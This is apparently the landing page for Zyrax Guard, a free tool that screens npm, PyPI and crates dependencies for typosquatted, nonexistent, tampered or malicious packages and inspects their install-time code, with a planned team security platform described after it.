Zyrax is building a platform to keep malicious and risky code out of the software you ship. The first piece is already here, and it is free.
Available now · Free & open-source
Zyrax Guard checks your npm, PyPI, and crates dependencies for malicious or risky packages before you install them. No signup, no config, and nothing ever leaves your machine.
Flags names one keystroke away from popular packages, like reqeusts instead of requests.
Cross-checks curated and public advisory feeds for confirmed-bad packages.
Catches AI-suggested packages that do not actually exist on the registry.
Warns on brand-new, low-adoption packages that nobody is depending on yet.
Detects tampered or mismatched lockfile entries in your pull requests.
Surfaces sudden ownership or maintainer handoffs, a classic takeover signal.
Add --deep and Zyrax Guard downloads the package and statically inspects the code it runs at install time, things like network calls, process spawning, and obfuscated eval, then blocks the dangerous combinations. No sandbox, no Docker, and zero dependencies.
The free tool protects one machine. The platform will protect everything you ship, across every team and repository.
Every dependency across all your repositories, watched in real time.
Set your security rules once and enforce them across every team and repo.
Full visibility, audit trails, and compliance-ready reports for your security team.
A curated feed that flags malicious packages before they reach public databases.